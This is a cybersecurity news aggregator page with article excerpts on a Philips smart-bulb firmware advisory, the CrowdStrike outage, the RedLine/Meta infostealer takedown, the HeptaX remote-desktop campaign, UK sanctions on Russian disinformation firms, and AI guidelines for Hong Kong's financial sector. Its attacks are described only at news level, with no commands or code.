Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for IoT Vulnerabilities ...

 Cyber News

In an era where the Internet of Things (IoT) promises convenience and efficiency, the rapid adoption of smart home technology comes with hidden security risks. From smart fridges to light bulbs, IoT devices have transformed our homes into connected hubs controlled via smartphones. However, a recent report on   show more ...

vulnerabilities in Philips smart lighting products reveals just how easily hackers can exploit these devices to gain unauthorized access to home networks, raising concerns about the security of everyday tech. CERT-In’s Warning: Vulnerabilities in Philips Smart Lighting Products On October 25, 2024, India’s Computer Emergency Response Team (CERT-In) issued a high-severity vulnerability in Philips smart lighting products (CIVN-2024-0329). The advisory highlighted the risks associated with storing sensitive Wi-Fi credentials in plain text within the devices’ firmware. The affected devices include Philips Smart Wi-Fi LED Batten, LED T Beamer, and a range of Smart Bulb and T-Bulb models, all using firmware versions prior to 1.33.1. Smart light bulbs, such as Philips’ Wi-Fi-enabled models, have grown popular among tech-savvy consumers. These bulbs connect to home Wi-Fi networks, allowing users to control brightness, color, and other settings from anywhere in the world through a phone app. Configuration is simple: after installation, the bulb can be toggled on and off multiple times to enter setup mode, transforming the device into a temporary Wi-Fi access point that connects to a smartphone for configuration. However, this ease of use also provides an entry point for hackers. If a hacker gains physical access to these devices, they could extract the firmware and obtain sensitive data by analyzing the binary code. Storing Wi-Fi credentials in plain text not only simplifies the setup process but also makes these credentials easily accessible to potential attackers. Once Wi-Fi credentials are obtained, hackers can connect to the home network, potentially gaining access to other connected devices and private information. CERT-In strongly recommends that users upgrade their firmware to version 1.33.1 to mitigate this vulnerability in Philips smart lighting products. [caption id="attachment_92011" align="aligncenter" width="1024"] Source: CERT-In[/caption] Weak Authentication and Network Impersonation: A Recipe for Intrusion A study examining the security weaknesses in IoT light bulbs like Philips smart bulbs revealed further vulnerabilities during the setup process. When entering configuration mode, the bulb lacks a secure authentication standard, allowing attackers to create a fake access point that the user may mistakenly connect to instead of the light bulb. This unauthorized access, known as “man-in-the-middle” interference, allows attackers to intercept the communication between the user’s app and the device. The method used to authenticate devices during the setup process is also weak. The checksum, a security code embedded within the bulb’s firmware, can be obtained through decompilation and brute force, especially since it’s only 32 bits. With current computing power, it takes just over two hours on average to crack this code, enabling attackers to mimic the device and intercept user credentials, such as the Wi-Fi password and manufacturer portal login. Beyond the vulnerability of the authentication process, the study also noted weaknesses in the encryption used for communication between the bulb and the app. Philips smart bulbs employ AES-128-CBC, a cryptographic algorithm, to secure data. While AES-128-CBC is generally reliable, the way it’s implemented in these devices opens the door for potential breaches. Determined attackers could potentially decipher the encrypted data, thereby accessing sensitive information sent between the bulb and the app. Credential Stuffing and the Ripple Effect of Poor IoT Security When attackers successfully extract Wi-Fi credentials from a compromised device, they can potentially conduct “credential stuffing” attacks. Credential stuffing involves using one set of stolen credentials to try to access multiple accounts, as many users reuse the same password across platforms. Thus, a hacker who compromises a Philips smart bulb and obtains its credentials might use this information to access the user’s social media, email, or even financial accounts if the user relies on similar passwords. The example of Philips smart bulbs sheds light on a broader issue in IoT security. Weak security measures in one device can affect a range of other systems connected to the same network. Security Vulnerabilities in the ZigBee Protocol: The Philips Hue Case Philips smart bulbs are not the only IoT lighting products to be scrutinized. A prior security analysis of the Philips Hue smart bulbs identified vulnerabilities in the ZigBee protocol, which is used to manage IoT devices remotely. The flaw, designated as CVE-2020-6007, allowed hackers to gain control over the bulb and install malware, with a severity score of 7.9 on the CVSS scale, indicating a high-risk vulnerability. ZigBee’s protocol vulnerability enabled hackers to infiltrate the user’s network via the smart bulb, spreading malware or exploiting other IoT devices connected to the network. This incident highlights the broader security concerns across IoT lighting products, as hackers can leverage one device’s weakness to penetrate larger home networks. Steps Toward a Secure IoT Ecosystem While the convenience of smart lighting and other IoT devices is undeniable, these benefits come at the cost of potential security weaknesses. For users, it is crucial to take proactive steps, such as installing firmware updates, using unique passwords for each platform, and securing their Wi-Fi networks with strong passwords. Manufacturers, on the other hand, need to adopt robust security standards and make device security a priority from the outset. For Philips users, CERT-In recommends upgrading to firmware version 1.33.1 for all affected devices to reduce the risk of unauthorized access. Philips and other IoT manufacturers are being urged to enhance security measures to protect consumers from these vulnerabilities.

image for Tenable’s Scott Ca ...

 Business News

The recent CrowdStrike outage —a major player in cybersecurity—serves as a critical wake-up call for organizations everywhere. Affecting over 8.5 million devices, this incident highlights the vulnerabilities that can impact even the most vigorous security frameworks. As businesses increasingly rely on technology   show more ...

to protect sensitive data, the need for proactive measures and resilient strategies has never been more apparent. In an exclusive interview, Scott Caveza, a staff research engineer at Tenable, shares valuable insights into the lessons organizations can learn from the CrowdStrike outage and how they can enhance their cybersecurity preparedness to withstand future disruptions. CrowdStrike Outage Lesson: The Importance of Business Resilience Caveza emphasizes that the incident highlights the critical need for business resilience in cybersecurity. "Technology has existed long enough for us to know that defects or bugs will always exist," he notes. "However, resilience hinges not only on preventive action but also on how changes and updates are deployed within the IT environment." The CrowdStrike outage impacted at least 8.5 million devices, highlighting the potential fallout from faulty updates. To mitigate such risks, Caveza advocates for thorough testing before deploying updates. "The best practice is to test updates in a staging environment that includes rollback testing, stability testing, and interface testing," he explains. This proactive approach ensures that potential issues are identified and resolved before they affect the wider organization. Balancing Updates with Security When discussing the impact of outages on cybersecurity posture, Caveza asserts that resiliency in technology systems is more than just preventing outages. "It requires creating systems and policies that lead to faster recovery and the ability to continue functioning even when problems arise," he explains. He suggests that organizations should prioritize testing efforts based on potential impact and implement gradual deployment strategies with strong rollback procedures. Using centralized platforms to organize testing data and consolidate results will streamline the testing process," he adds. The Future of Cyber Insurance The CrowdStrike incident raises questions about the future of cyber insurance, particularly regarding systemic risks. "This outage is an example of what the insurance industry calls a systemic risk," Caveza notes. Insurers may need to adjust their risk assessments and pricing structures in response. We could see a tiered pricing structure that rewards robust defenses while penalizing poor cyber hygiene. As cyber insurance providers reevaluate their terms, the emphasis on preventive measures will likely increase. Caveza predicts that insurers will direct customers to focus on proactive strategies rather than solely relying on reactive incident response. Preventive security measures are essential," he states. They involve obtaining visibility across your entire attack surface and identifying critical vulnerabilities. Caveza stresses the importance of managing the risks associated with automated updates. "A great way to mitigate single points of failure is by gaining visibility into the entire attack surface," he advises. Continuous monitoring and remediating misconfigurations are essential to staying ahead of potential threats. Strengthening Incident Response Strategies Effective incident response is vital for handling unexpected service disruptions. Caveza outlines a structured approach: "Investigation and assessment of the scope of the incident come first, followed by immediate actions to prevent additional assets from being affected." Organizations must remove the threat and restore data to a known good state to ensure business continuity. "This incident showcased how unprepared many organizations were in their incident response strategies," he adds. The lessons learned must lead to the implementation of robust strategies for future preparedness. Enhancing Resilience Against Cyber Threats Looking ahead, Caveza believes organizations need to reassess their quality assurance processes in light of increasing cybersecurity incidents. "Ultimately, it depends on whether the cost of the impact will be less than the cost of installing checks and balances," he explains. He concludes that organizations must have clear guidelines for activating cybersecurity plans during crises. "Regular testing of these plans is crucial, especially for large-scale incidents, to ensure quick responses and minimize losses." Final Thoughts The CrowdStrike outage is a clarion call for organizations to rethink their cybersecurity strategies. As Scott Caveza articulates, the landscape is fraught with risks that can emerge from the most unexpected corners. "In today’s digital environment, resilience isn’t just a safety net—it's a competitive advantage," he emphasizes. By embracing a culture of proactive security, thorough testing, and continuous improvement, organizations can not only shield themselves from immediate threats but also cultivate a strong posture against future disruptions. As we traverse an era of increasing cyber threats, the question isn't whether an incident will occur, but how prepared we will be when it does. The future belongs to those who prioritize resilience and adaptability in their cybersecurity frameworks, ensuring they not only survive but thrive amidst the chaos.

image for Law Enforcement Puts ...

 Cyber Essentials

International law enforcement disrupts operations of two of the most widely used infostealer malware around the globe - RedLine and Meta. According to a notice put on the official website where the first details of the takedown appeared, the action was a coordinated effort led by the Dutch Police authorities and   show more ...

supported by the FBI and other partners of the international law enforcement including the United Kingdom, Australia, Portugal and more. "Operation Magnus, disrupted operation of the Redline and Meta infostealers. Involved parties will be notified, and legal actions are underway," the notice said. [caption id="attachment_92069" align="aligncenter" width="600"] Source: operation-magnus.com[/caption] Along with the notice, the law enforcement agencies included a 50-second video, which stated that they "gained full access to RedLine and Meta [stealers] servers." What's Likely Taken Down in Operation Magnus The video further claimed the two infostealers are pretty much the same and that the version now dismantled gave unique insights in the customers who used this malware-as-a-service offering on the dark web. This includes username, passwords, IP, addresses, timestamps, registration date, etc. of all those who have registered and taken services from this MaaS service provider. The law enforcement was also likely able to hack into the main frame infrastructure including the licensed servers, REST-API servers, stealers and even Telegram bots that were used by the gang to operate their network over social networking and messaging channels. Apart from this, a scroll of usernames, which the authorities called as "VIP clients" was also shown but it is not clear if they have been arrested or were indicted. As per the timer set on the official website, more details will be revealed in a day's time. A joint statement is expected. [caption id="attachment_92070" align="aligncenter" width="600"] Source: operation-magnus.com[/caption] The manner of setting up a website and revealing details in this case is similar to "Operation Endgame," again a major international law enforcement operation, which disrupted a large-scale botnet infrastructure, targeting notorious malware droppers like IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and TrickBot. Read: Operation Endgame – Largest Ever Operation Against Multiple Botnets Used to Deliver Ransomware *This is a developing story and will be updated as more information is available.

image for HeptaX: Uncovering C ...

 Firewall Daily

Cyble Research and Intelligence Labs (CRIL) has reported an ongoing cyberattack campaign orchestrated by a persistent threat group known as HeptaX. This campaign exploits various tactics to gain unauthorized Remote Desktop access, posing multiple risks to a wide array of users, particularly within the healthcare   show more ...

sector.   The campaign initiates with the delivery of malicious shortcut files (.lnk) embedded in ZIP archives, likely disseminated through phishing emails. This sophisticated multi-stage attack chain relies heavily on PowerShell and BAT scripts to facilitate the download and execution of further payloads, showcasing the attackers’ preference for script-based techniques that can evade traditional security measures.   Once the malicious LNK file is executed, it triggers a PowerShell command that not only downloads subsequent payloads from a remote server but also creates an administrative user account on the compromised system. This alteration of Remote Desktop settings lowers authentication requirements, making it easier for the threat actors to establish unauthorized remote access.   Additionally, HeptaX utilizes a well-known password recovery tool called ChromePass, which harvests saved passwords from Chromium-based browsers, significantly increasing the potential for broader account compromises. Due to the elusive nature of this group’s tactics, CRIL has opted to track this campaign under the moniker "HeptaX."   HeptaX Campaign Overview   The HeptaX campaign exemplifies a multi-layered approach to cyber espionage. It begins with a seemingly innocuous ZIP file that contains a malicious LNK file. While the exact source of these ZIP files remains unidentified, it is highly suspected that they are spread through phishing schemes aimed at the healthcare industry.   [caption id="attachment_92048" align="alignnone" width="590"] HeptaX campaign infection chain (Source: Cyble)[/caption] Upon execution, the LNK file launches a PowerShell command that downloads additional payloads, including more PowerShell scripts and BAT files, from a remote server. The series of scripts work in concert to establish a new user account with administrative privileges, modify Terminal Services (Remote Desktop Protocol) settings, and create a pathway for the attackers to carry out data exfiltration, malware installation, or even system surveillance.   The infection process begins with the execution of the LNK file, leading to the download of a PowerShell script. This script retrieves a unique identifier (UID) for the compromised system, which can be obtained from specific registry paths or generated if none exists. [caption id="attachment_92050" align="alignnone" width="624"] UID Generation (Source: Cyble)[/caption] Following this, the script creates a persistent shortcut in the Windows Startup folder, ensuring that the malware remains active upon system reboot.   Subsequent stages of the attack involve disabling User Account Control (UAC) settings and executing additional malicious scripts. The use of ChromePass to extract saved passwords from web browsers amplifies the risks posed to victims, as sensitive credentials can be easily compromised.   Technical Analysis   The HeptaX campaign is characterized by a reliance on PowerShell and Batch scripts, which facilitate control over compromised systems. The initial PowerShell script constructs a base URL to send information and download other payloads. This approach reflects a trend in cyberespionage operations where attackers favor script-based methods to bypass detection.   [caption id="attachment_92049" align="alignnone" width="624"] De-Obfuscated PowerShell Code (Source: Cyble)[/caption] The first stage of the attack involves the downloaded PowerShell script collecting system information and adjusting UAC settings. If UAC is found to be disabled or set to a lower security level, the script proceeds to download additional scripts that further compromise the system.   One of the most critical stages occurs when the attackers create a new user account named “BootUEFI” with administrative rights and modify Remote Desktop settings. These adjustments facilitate seamless unauthorized access, allowing attackers to exploit the compromised systems at will.   Step-by-Step Breakdown of the Attack Stages   Initial Compromise: The attack begins with a phishing email containing a ZIP file. This ZIP file includes a malicious LNK file that initiates the attack upon execution.   PowerShell Execution: Once the LNK file is executed, it triggers a PowerShell command to download further payloads from a remote server. This script gathers a UID from the compromised system and sets up persistence by creating a new shortcut in the Startup folder.   UAC Manipulation: The script checks and modifies UAC settings to lower security measures, allowing attackers easier access to the system.   Batch File Deployment: The script downloads and executes multiple BAT files, which facilitate the creation of the administrative account and adjust Remote Desktop settings for unauthorized access.   Final Payload Execution: The final stage involves downloading a PowerShell script that performs reconnaissance on the system and gathers sensitive information, including user credentials and network configurations.   Exploitation of Remote Desktop Access   Once the attackers have established a foothold through the creation of the “BootUEFI” account, they can easily take over the compromised Remote Desktop. This access enables them to carry out various malicious activities, including:   Installing Additional Malware: With unrestricted access, attackers can install further malware to enhance their control over the system.   Data Exfiltration: Sensitive information can be siphoned off with little resistance, posing a significant threat to data privacy and integrity.   Monitoring User Activity: Attackers can surveil user actions, gaining insights into organizational processes and potentially sensitive information.   System Manipulation: They can alter system settings to further entrench their presence or create backdoors for future access.   The deployment of ChromePass within the infrastructure indicates a focused intent on harvesting saved passwords, amplifying the threat level posed to both individuals and organizations.  Conclusion   The HeptaX campaign highlights the rising threat of hackers, particularly in cyber espionage operations that exploit Remote Desktop access through basic scripting languages like PowerShell and BAT scripts, allowing for complex, undetected attacks.    To counter these threats, organizations should implement email filtering to block harmful attachments, educate employees on phishing risks, restrict the execution of scripting languages, establish strict policies for privileged account creation, regularly monitor User Account Control settings, strengthen Remote Desktop security with multi-factor authentication, and employ comprehensive network monitoring to detect unusual activities.    By taking these proactive steps, organizations can significantly enhance their defenses against sophisticated threats like those posed by HeptaX, fostering a more secure digital environment. 

image for UK Sanctions 3 Russi ...

 Cyber News

The UK today sanctioned three Russian firms and their leaders for a propaganda campaign that attempted to weaken European support for Ukraine. The sanctions are aimed at the Russian state-funded Social Design Agency (SDA), along with partner company Structura National Technologies and PR firm ANO DIALOG, which a UK   show more ...

statement said “attempted to deliver a series of interference operations designed to undermine democracy and weaken international support for Ukraine.” The UK action follows a similar one by the U.S. in early September that was aimed at reducing the influence of the firms - which are also known as the “Doppelganger” disinformation campaign - on the presidential election and U.S. views of Ukraine. U.S. officials cheered the UK news in a statement today. The UK said the action was also supported by Canada, France, the European External Action Service (EEAS), Germany and Australia. 'Doppelganger' Campaign Targeted Europe Too In addition to its U.S. efforts, the UK said SDA “also attempted to incite protests in half a dozen European countries.” The Russian campaign was low quality, however, and struggled to gain traction. “However, despite Russia pouring money into these malign organisations’ interference activities, their lies have consistently struggled online, with bots and fake sites getting limited interaction,” the UK statement said. “This has forced the SDA to consider buying social media views.” In a somewhat taunting statement, UK Foreign Secretary David Lammy said: “Putin is so desperate to undermine European support for Ukraine he is now resorting to clumsy, ineffective efforts to try and stoke unrest. Today’s sanctions send a clear message: we will not tolerate your lies and interference, and we are coming after you. Putin’s desperate attempts to divide us will fail. We will constrain the Kremlin, and stand with Ukraine for as long as it takes.” In addition to the three firms, the UK also sanctioned: Ilya Andreevich Gambashidze, the founder of SDA Nikolay Aleksandrovich Tupikin, the CEO of SDA and owner of Structura Andrey Naumovich Perla, SDA Project Director UK Accuses Firms of 'Vast Malign Network' The sanctioned firms and individuals are responsible for a “vast malign online network ... which plagues social media with fake posts, counterfeit documents and deepfake material,” the UK said. “These deceitful tactics are designed to mask the truth around Russia’s illegal invasion of Ukraine and distract from the true nature of the war.” The firms' content was distributed in English, German and French through a network of at least 120 sites that spoofed existing news and government websites in an attempt to redirect unsuspecting social media users. Doppelganger’s tactics included avoiding common trigger words to make sure the content made it past moderation tools. “We are working with social media platforms to ensure they are aware of this activity,” the UK said. France first exposed the campaign in June 2023, and European sanctions soon followed. Doppelganger was also active in this year’s European parliamentary elections. U.S. Cheers UK Sanctions The U.S. State Department said in a statement that it welcomes the UK actions. “An open, free, and fact-based information environment is central to a well-functioning democratic society,” the U.S. statement said. “When malign actors working as tools of the Kremlin exploit and undermine that environment, democracies must respond. This and other recent exposure efforts targeting Kremlin disinformation demonstrate the growing coordination between the United States, the United Kingdom, and our multilateral partners. Together, we will continue to promote accountability for foreign malign information operations that seek to undermine our societies and democratic processes.” The U.S. statement also noted that Doppelganger engaged in a “pro-Kremlin information laundering scheme in twelve Latin American countries, where Kremlin-produced disinformation was covertly placed in local outlets to appear as genuine news articles.”

image for Cyberattacks on Crit ...

 Firewall Daily

In today's world, it's hard to miss the constant buzz about cyber threats, especially when they hit critical infrastructure and sectors like energy, healthcare, and transportation. These attacks are not just increasing in number; they're becoming more sophisticated, making it crystal clear that we need to   show more ...

step up our defenses.   Take recent events, for example. In February, the Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), and FBI teamed up with their partners to issue a serious warning. They alerted key infrastructure sectors about potential cyber threats, drawing attention to vulnerabilities that had already been exploited by cyber operations linked to the People’s Republic of China (PRC).   And it’s not just happening in the U.S. a cyberattack on a nuclear facility in the UK recently showed us how high the stakes can be when it comes to protecting our infrastructure. Yet, despite all the alarms and awareness, there’s still a huge gap in both legislation and international cooperation on cybersecurity.   The Dying Need for a Better Global Cyber Treaty   The current state of cybersecurity for critical infrastructure is fragmented, with a patchwork of regulations and standards that often fail to address the complexities of modern threats. Although the United Nations adopted voluntary norms in 2015, their impact has been limited.   Cyber incidents targeting infrastructure have reportedly doubled between 2020 and 2022, according to the International Energy Agency, highlighting the inadequacy of the current response framework.    To address this pressing issue, the international community should consider establishing a global cyber treaty specifically focused on enhancing the protection of critical infrastructure. Such a treaty could build on existing frameworks, introducing binding measures that would elevate global cybersecurity standards.   Currently, the cybersecurity regulatory environment comprises a mix of federal laws, industry standards, and sector-specific guidelines. However, none of these regulations provide comprehensive coverage for all critical infrastructure sectors.   Health Insurance Portability and Accountability Act (HIPAA): This federal law is crucial for safeguarding medical information, requiring healthcare providers and their associates to implement security measures to protect patient data. Despite its importance, HIPAA's scope is limited to the healthcare sector and does not extend to other critical infrastructure areas.   Cybersecurity Maturity Model Certification (CMMC): Designed for defense contractors working with the Department of Defense (DoD), the CMMC ensures these entities adhere to specific cybersecurity standards. However, its applicability is restricted to defense-related contractors, leaving other sectors without comparable protections.   Payment Card Industry Data Security Standard (PCI DSS): This industry standard, adopted widely across states, sets security requirements for entities handling credit card data. Yet, PCI DSS does not encompass critical infrastructure sectors beyond financial transactions.   Communications Assistance for Law Enforcement Act (CALEA): Enforced by the Federal Communications Commission (FCC), CALEA mandates telecommunications companies to facilitate lawful interception of communications. However, CALEA's focus on law enforcement does not address broader cybersecurity concerns.   North American Electric Reliability Corporation Critical Infrastructure Protection (NERC CIP): NERC CIP guidelines are instrumental in securing the electric grid from cyber threats. Nonetheless, they are sector-specific and do not extend to other critical infrastructure areas such as transportation or manufacturing.   Despite these existing frameworks, there is no central, comprehensive approach to cybersecurity across all critical infrastructure sectors. This fragmented regulatory environment often results in gaps that cyber adversaries can exploit.   The Case for a Unified Cybersecurity Framework   The need for a more integrated regulatory approach is not only important but has become the need of the hour. Centralized regulations could establish a baseline for security practices, encouraging organizations to develop and refine their cybersecurity strategies.  This would address common vulnerabilities and foster innovation in security measures. For instance, the Zero Trust model, which manages interactions between people, data, and systems to mitigate security risks, has emerged in response to the need for better security in increasingly parameterless networks.  Centralized regulations could also standardize security practices across supply chains, reducing vulnerabilities that arise from interconnected business operations. By ensuring that all parties adhere to the same security protocols, organizations can better manage and mitigate risks. This approach would not only enhance security but also build trust among stakeholders, including consumers and supply chain partners.   The current threat system highlights the need for better regulatory frameworks. Online threats such as Advanced Persistent Threats (APTs) and the convergence of IT and Operational Technology (OT) systems pose significant challenges.   Convergence of IT and OT Systems: The integration of IT and OT systems has expanded the attack surface for critical infrastructure. Systems like industrial control systems (ICS) and supervisory control and data acquisition (SCADA) are now vulnerable to cyber threats that were previously limited to IT networks. This convergence highlights the need for integrated cybersecurity frameworks that address both IT and OT environments.  Advanced Persistent Threats (APTs): APTs are sophisticated, often state-sponsored attacks aimed at high-value targets over extended periods. Addressing APTs requires advanced detection and response capabilities, as well as continuous monitoring and threat intelligence. Regulations that mandate these capabilities could help organizations better defend against such sophisticated attacks.   Internet of Things (IoT) and Legacy Systems: The proliferation of IoT devices introduces additional security challenges, as many are designed with minimal security controls. Moreover, critical infrastructure often relies on legacy systems that were not designed with modern cybersecurity threats in mind. Updated regulatory standards are needed to address these vulnerabilities.   Global Perspectives and Recommendations   Given the global nature of cyber threats, international cooperation is essential for protecting critical infrastructure. A global cybersecurity treaty focused on critical infrastructure could help establish universal standards and norms. Such a treaty would provide a framework for responding to cross-border cyber threats and build on existing frameworks, like the UN’s guidelines on responsible state behavior in cyberspace.   Enhancing public-private partnerships is also crucial. Collaboration between government agencies, industry stakeholders, and cybersecurity experts can lead to more effective security measures and facilitate the sharing of threat intelligence. Initiatives such as the Cybersecurity and Infrastructure Security Agency (CISA) and Information Sharing and Analysis Centers (ISACs) play a vital role in fostering this collaboration.   Moreover, promoting innovation in cybersecurity is essential for staying ahead of emerging threats. Investing in research and development for new security technologies and fostering collaboration between researchers, developers, and industry practitioners can drive the development of advanced security solutions.   To Sum Up   As we navigate the complexities of our digital world, upgrading cybersecurity standards for critical infrastructure is more urgent than ever. The recent spike in cyberattacks on energy grids, healthcare systems, and transportation networks exposes a troubling stagnation and insufficiency in our current defenses.   While frameworks like HIPAA, CMMC, and PCI DSS exist, they fall short of covering all critical sectors comprehensively. The fragmented nature of today’s cybersecurity landscape leaves dangerous gaps, especially as technology advances and threats become more sophisticated.   To truly tackle these challenges, the international community needs to push for a unified global cyber treaty. Such a treaty could bring a cohesive approach to protecting critical infrastructure, establishing universal standards, and enhancing global cooperation. By aligning our efforts, standardizing practices, and encouraging innovation, we can build a stronger, more resilient cybersecurity strategy capable of standing up to the evolving threats of the digital age.

image for Malaysia Becomes a C ...

 Firewall Daily

BlackBerry Limited has officially announced the establishment of its Asia Pacific (APAC) Cybersecurity Regional Headquarters in Malaysia, located in the burgeoning tech hub of Cyberjaya.    The decision to set up the BlackBerry APAC HQ in Malaysia aligns with the company's long-term vision of leveraging the   show more ...

country’s proximity to emerging technology centers and better government infrastructure.    BlackBerry’s move is significant given the recent partnership with the Malaysian government, highlighted by a cybersecurity agreement in November 2023.   BlackBerry APAC HQ in Malaysia This partnership with the Malaysian Communications and Multimedia Commission (MCMC) led to the creation of the Cybersecurity Center of Excellence (CCoE), a premier training facility to upskill Malaysia’s cybersecurity workforce. The center will play a crucial role in preparing professionals for the challenges posed by cyber threats.   Tash Stamatelos, BlackBerry's Vice President for Cybersecurity in APAC, emphasized the importance of Malaysia as a strategic market. “As the nation prepares to chair ASEAN in 2024, we commend Malaysia's proactive measures in fostering digital transformation and regional collaboration in cybersecurity,” he stated. Stamatelos highlighted Malaysia's ongoing investments in skills development, innovation, and infrastructure as key factors that make it an attractive destination for global companies, including BlackBerry.   The BlackBerry APAC HQ in Malaysia is home to a diverse team of specialists encompassing sales, marketing, threat research, technical support, and professional services. This team, including several experienced cybersecurity trainers, is dedicated to empowering cyber-defenders in Malaysia and across the region.   Communications Minister Fahmi Fadzil expressed strong support for the establishment of the BlackBerry APAC HQ in Malaysia, indicating that it would serve not only Malaysia but the wider APAC region by leveraging BlackBerry's advanced cybersecurity solutions. This initiative represents a significant step toward enhancing regional cybersecurity and driving innovation," he noted.   BlackBerry Plans for Cybersecurity Enhancements in Malaysia   Recently, BlackBerry received recognition for its commitment to capacity building and cyber-resilience, winning the Cyber Security (Service) Innovation accolade at Malaysia's Cyber Security Awards 2024 on August 8. This award reflects the company’s dedication to supporting Malaysia’s ambition of becoming a secure digital nation.   On October 23, 2024, BlackBerry furthered its commitment to cybersecurity education in Malaysia by partnering with the International Information System Security Certification Consortium (ISC2). This collaboration aims to deliver globally recognized cybersecurity training and certifications as part of the BlackBerry Cybersecurity Curriculum at the CCoE.   With the Malaysian government focused on enhancing digital skills, the introduction of ISC2 courses and will provide valuable opportunities for professionals in the cybersecurity field.   Han Ther Lee, Director of Education and Training at the CCoE, highlighted the importance of this partnership. As Malaysia gears up for the 'Year of Skills' in 2025, we are committed to working alongside the government and industry to educate and grow the nation’s cybersecurity workforce," he said. The courses will include critical certifications such as Certified Information Systems Security Professionals (CISSP) and Certified Cloud Security Professionals (CCSP), essential for strengthening national and regional cybersecurity capabilities.   Cigdem Bildirici, Vice President of Business Development at ISC2, also expressed enthusiasm for the partnership, noting the vital need to bolster the cybersecurity workforce amid increasing digital connectivity and associated risks in Malaysia.   Since its inception in March 2024, the Cybersecurity Center of Excellence has trained over 1,500 professionals, dedicating more than 8,000 hours to skill development. With the addition of ISC2 programs, the CCoE is set to expand significantly. 

image for Hong Kong Launches F ...

 Business News

Hong Kong has unveiled its first guidelines for the "responsible" application of artificial intelligence (AI) in the financial sector. Announced during the annual FinTech Week, these AI guidelines aim to help financial institutions harness AI’s transformative potential while safeguarding data privacy,   show more ...

cybersecurity, and intellectual property. By leading this initiative, the Hong Kong government is setting a regulatory framework to balance innovation with caution, ensuring the technology’s sustainable integration into banking, asset management, and other financial services. The AI guidelines require banks, brokers, asset managers, and other financial institutions to establish an AI governance strategy, advising on how AI should be implemented and used. Institutions must also adopt a risk-based approach in managing AI systems and maintain human oversight to mitigate potential risks. “As an international financial centre, Hong Kong’s market is both open and prudent in embracing AI,” said Financial Secretary Paul Chan. “Our policy clearly sets forth the government’s stance on AI's responsible application in finance. We aim to leverage Hong Kong’s unique position as a connector between the Mainland and international markets, and with the free flow of information, we can accelerate development and productivity tailored to local needs.” Key Points of Hong Kong's AI Guidelines The AI policy statement, delivered jointly by Hong Kong’s top financial and technology officials, highlights the government's perspective on AI as a "data-driven, double-edged, and dynamic" tool. This view acknowledges both the opportunities and challenges AI presents, particularly in areas such as cybersecurity and privacy. Some of the main points outlined in the policy are: Dual-Track Development: Recognizing AI’s potential and associated risks, the government plans to follow a dual-track approach. This means promoting AI’s growth in finance while addressing challenges around cybersecurity, data protection, and intellectual property rights. AI Governance Strategy: Financial institutions are encouraged to create strong governance strategies for AI, focusing on a risk-based approach in procurement, usage, and management. Human oversight remains a critical component in overseeing these AI systems. Support from Local Universities: The Hong Kong University of Science and Technology (HKUST) will make its self-developed AI model and computing resources available to financial institutions, offering both advisory and training services. This collaboration underscores Hong Kong’s commitment to building a solid AI infrastructure that aligns academic resources with industry needs. Regulatory Vigilance and Adaptation: As AI technology rapidly evolves, financial regulators will continue reviewing and updating regulations to ensure alignment with international practices, such as the shift toward explainable AI. Strengthening Cyber Policing and Public Education: In partnership with international organizations, Hong Kong's police will work to strengthen cyber policing efforts. Additionally, the Investor and Financial Education Council will launch initiatives to educate the public on AI's impact on retail investing and financial management. FinTech Week Emphasizes AI and Hong Kong’s Global Role Hong Kong’s FinTech Week, hosted by InvestHK and Finoverse, has become a significant event for the region's finance and tech industries. Now in its ninth year, the conference runs from October 28 to November 1, attracting 700 companies and highlighting Hong Kong's position as a strategic link between global businesses and China, the world’s second-largest AI market. At the event, Secretary for Financial Services and the Treasury Christopher Hui highlighted the government’s commitment to fostering a “healthy and sustainable” AI-driven market. “We encourage financial institutions to seize AI’s opportunities, as it can advance Hong Kong’s reputation as a high-quality, international financial hub,” he said. Hui also noted that numerous AI models and infrastructure are available for financial firms to leverage, emphasizing that these resources could support institutions in meeting both local and global challenges. To emphasize Hong Kong’s commitment to AI, Hui showcased an AI avatar developed locally, a symbolic step for Hong Kong’s future in digital technology. “We want our financial sector to make full use of these AI resources,” Hui added, emphasizing the role of the industry in driving sustainable growth and competitiveness in the region. AI Applications on the Rise: HSBC’s Perspective AI’s rapid adoption in finance is already in motion, with applications in enhancing productivity, customer service, programming, and even coding. In a fireside chat during FinTech Week, Luanne Lim, CEO of HSBC Hong Kong, highlighted the extensive usage of generative AI (GenAI) within the bank. According to Lim, HSBC is exploring over 100 GenAI use cases to streamline its services and boost client-facing functions. “Generative AI brings significant benefits, but not without its own risks and limitations,” said Lim, who also chairs the Hong Kong Association of Banks. “This is where regulation plays an important role, and we welcome the government’s policy.” For HSBC, AI offers a competitive edge, but it also requires collaboration across the industry to build a robust and trusted digital ecosystem. Lim believes that Hong Kong’s ambition to become a global digital innovation hub will succeed only through collaboration. “The future of AI in finance depends on a collaborative, rather than competitive, approach. A strong ecosystem will help drive digital transformation while ensuring responsible AI practices,” she added. Balancing Innovation with Security AI’s adoption in financial services holds considerable promise for Hong Kong, but it also raises cybersecurity and ethical concerns. By emphasizing the importance of a dual-track approach and prioritizing public education, the Hong Kong government aims to balance innovation with precaution. The Investor and Financial Education Council, a government initiative, will work on public outreach programs to raise awareness about AI’s impact on retail investment and personal finance. These efforts aim to help citizens navigate AI-driven products responsibly while understanding the associated risks. With this new framework, Hong Kong aspires to lead by example in integrating AI responsibly into financial services. The AI policy reflects the government's understanding that while AI can drive growth and efficiency, it must be managed with oversight and vigilance. As Hong Kong moves forward with its AI strategy, it sets a precedent for other financial centers seeking to embrace technological advancements without compromising security and ethical standards.

image for How to track Kia car ...

 Privacy

A group of security researchers discovered a serious vulnerability in the web portal of the South Korean car manufacturer Kia, which allowed cars to be hacked remotely and their owners tracked. To carry out the hack, only the victims car license plate number was needed. Lets dive into the details. Overly connected   show more ...

